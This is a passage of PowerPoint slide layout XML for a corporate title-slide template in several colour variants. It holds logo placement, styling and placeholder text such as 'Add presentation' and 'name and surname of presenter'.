          <p:cNvPr id="38" name="Picture 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BE95350-3536-4019-9595-2B716E16A64C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10098982" y="91025"/>
            <a:ext cx="1888312" cy="1847974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D23128A1-EDC7-4680-BB6B-7CB3E9740500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2934702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go on red">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent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C26AD0A-B2DA-4BA8-971E-89A9C370B04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4149377" y="1520825"/>
            <a:ext cx="3893247" cy="3810079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DC2B06C-F2D2-4BB1-ABBB-C1365B4CFAC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="785091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yellow">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7" y="1520905"/>
            <a:ext cx="7166539" cy="1637364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add presentation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7" y="3176198"/>
            <a:ext cx="7166539" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="240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
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3DFAA06-BCA8-4754-92E2-D4CD6336640A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4273068"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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date</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D270A3-CD1B-4C74-9532-388A93562569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4514289"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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name and surname of presenter</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46DA9D6C-9ED9-4AC5-BA48-6944457E654D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10098982" y="91025"/>
            <a:ext cx="1888312" cy="1847974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6783A12-C2E3-445B-A54D-6980960317F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32956251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rang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7" y="1520905"/>
            <a:ext cx="7166539" cy="1637364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add presentation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7" y="3176198"/>
            <a:ext cx="7166539" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="240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
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7200D456-A243-45F2-9216-DF8585E26C1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323036" y="6129338"/>
            <a:ext cx="7167600" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3DFAA06-BCA8-4754-92E2-D4CD6336640A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4273068"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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date</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D270A3-CD1B-4C74-9532-388A93562569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4514289"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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name and surname of presenter</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46DA9D6C-9ED9-4AC5-BA48-6944457E654D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10098982" y="91025"/>
            <a:ext cx="1888312" cy="1847974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2647247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ink">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7" y="1520905"/>
            <a:ext cx="7166539" cy="1637364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add presentation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7" y="3176198"/>
            <a:ext cx="7166539" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="240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
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7200D456-A243-45F2-9216-DF8585E26C1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323036" y="6129338"/>
            <a:ext cx="7178400" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3DFAA06-BCA8-4754-92E2-D4CD6336640A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4273068"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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date</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D270A3-CD1B-4C74-9532-388A93562569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4514289"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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name and surname of presenter</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46DA9D6C-9ED9-4AC5-BA48-6944457E654D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10098982" y="91025"/>
            <a:ext cx="1888312" cy="1847974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205308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lum">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7" y="1520905"/>
            <a:ext cx="7166539" cy="1637364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add presentation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7" y="3176198"/>
            <a:ext cx="7166539" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="240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
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7200D456-A243-45F2-9216-DF8585E26C1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3DFAA06-BCA8-4754-92E2-D4CD6336640A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4273068"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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date</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Placeholder 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D270A3-CD1B-4C74-9532-388A93562569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="4514289"/>
            <a:ext cx="7166539" cy="216000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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name and surname of presenter</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46DA9D6C-9ED9-4AC5-BA48-6944457E654D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10098982" y="91025"/>
            <a:ext cx="1888312" cy="1847974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26924883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dark plum">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7" y="1520905"/>
            <a:ext cx="7166539" cy="1637364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="36000" rIns="36000" bIns="36000" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add presentation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7" y="3176198"/>
            <a:ext cx="7166539" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
